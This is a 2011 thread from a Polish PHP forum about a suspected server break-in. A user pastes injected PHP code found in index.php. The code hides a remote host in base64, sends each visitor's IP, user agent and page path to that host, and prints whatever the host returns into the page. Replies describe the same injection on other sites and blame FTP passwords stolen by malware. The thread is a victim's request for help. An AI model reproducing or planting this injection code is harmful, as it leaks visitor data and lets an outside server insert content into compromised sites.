Podejrzenie włamania na serwer

Podejrzenie włamania na serwer, Proszę o szybką pomoc

Barcelona Zobacz profil	27.09.2011, 23:36:55 Post #1
Grupa: Zarejestrowani Postów: 322 Pomógł: 15 Dołączył: 29.01.2010 Ostrzeżenie: (0%)	Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem: [PHP] pobierz, plaintext <?php // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } ?> [PHP] pobierz, plaintext Co to jest? Proszę o pomoc.

Odpowiedzi

gekoncaros Zobacz profil	23.11.2011, 12:24:14 Post #2
Grupa: Zarejestrowani Postów: 1 Pomógł: 0 Dołączył: 23.11.2011 Ostrzeżenie: (0%)	Witam nie jestes sam ja tez na serwerze linuxpl.com tez dostałem do kazdego pliku index.php taki wlasnie dodatek w postaci 30 linii kodu najgorsze jest to ze mam tych indexow od groma i jeszcze troche i tu moje pytanie jak napisać jakis skrypt ktory by pousuwał dokładnie taki kod w okreslonych plikach

pioklo Zobacz profil	25.11.2011, 22:58:10 Post #3
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 30.05.2009 Ostrzeżenie: (0%)	Cytat(gekoncaros @ 23.11.2011, 13:24:14 ) Witam nie jestes sam ja tez na serwerze linuxpl.com tez dostałem do kazdego pliku index.php taki wlasnie dodatek w postaci 30 linii kodu najgorsze jest to ze mam tych indexow od groma i jeszcze troche i tu moje pytanie jak napisać jakis skrypt ktory by pousuwał dokładnie taki kod w okreslonych plikach Witam Dopiski do skryptow masz przez logowanie na ftp z adresu IP 188.72.250.20 ftpd17636 Fri Nov 25 15:41 - 15:41 (00:00) ::ffff:188.72.250.20 ftpd25799 Fri Nov 25 11:09 - 11:10 (00:00) ::ffff:188.72.250.20 Wykradzione hasla przez wirusy z programow klienckich ftp gdzie sa zapisywane bez szyfrowania.. Ip zostal zablokowany na firewallu polecam uzyc u nas pluginu do blokowania polaczen do ftp i konta na okreslone adresy IP wtedy mimo wykradzionego hasla takiej sytuacji by nie bylo bo boty by sie nie polaczyly pozdrawiam Piotr linuxpl.com

Posty w temacie

Barcelona Podejrzenie włamania na serwer 27.09.2011, 23:36:55

tabbi Ktoś zbiera dane na temat twojej strony i wysyła ... 27.09.2011, 23:55:21

Barcelona Tutaj zostaje wysłane, ale jakim cudem ten kod zna... 28.09.2011, 00:03:40

tabbi Odpowiedzi na to pytanie może być wiele, zaczynaj... 28.09.2011, 00:57:51

Barcelona Nikomu nie udostępniałem hasła, znam go tylko ja i... 28.09.2011, 01:43:53

Damonsson Total Commander? ;> 28.09.2011, 01:46:10

Barcelona Już dawno nie, WinSCP 28.09.2011, 02:02:17

konrados CytatTotal Commander? A właściwie to o co chodzi ... 2.10.2011, 12:54:04

pienso Jak będziesz wiedział to daj znać gdzie była luka ... 2.10.2011, 13:55:55

konrados CytatJak będziesz wiedział to daj znać gdzie była ... 2.10.2011, 15:10:37

drozdii07 Jeśli zapamiętujesz hasło w TC, to później wirusy ... 2.10.2011, 15:14:52

konrados CytatJeśli zapamiętujesz hasło w TC, to później wi... 2.10.2011, 15:19:40

Fifi209 Cytat(konrados @ 2.10.2011, 16:19:40 ... 2.10.2011, 15:53:44

Korab To może przeskanuj sobie komputer dwoma programami... 2.10.2011, 16:03:31

konrados CytatPo pierwsze, nie musisz sobie ściągać wirusa ... 2.10.2011, 16:42:25

92nasti Cytat(konrados @ 2.10.2011, 17:42:25 ... 2.10.2011, 17:41:38

konrados CytatBłyszczysz wiedzą, w sumie to za chwile dojdz... 2.10.2011, 17:49:26

Barcelona Uuuu troche mnie nie było i widzę że wątek nabrał ... 2.10.2011, 21:50:21

mcsgroup Cytat(Barcelona @ 2.10.2011, 22:50:21... 4.10.2011, 12:22:09

by_ikar KodWracając do tematów TC i wirusów, to ja jestem ... 3.10.2011, 09:54:32

Barcelona CytatWytłumacz mi jak antywirus znajdzie wirusa, n... 4.10.2011, 11:39:02

Barcelona No i dziękuje za potwierdzenie mojej teorii Jest ... 6.10.2011, 14:44:10

gekoncaros Witam nie jestes sam ja tez na serwerze linuxpl.co... 23.11.2011, 12:24:14

pioklo Cytat(gekoncaros @ 23.11.2011, 13:24... 25.11.2011, 22:58:10

« Następny starszy · PHP · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Forum PHP.pl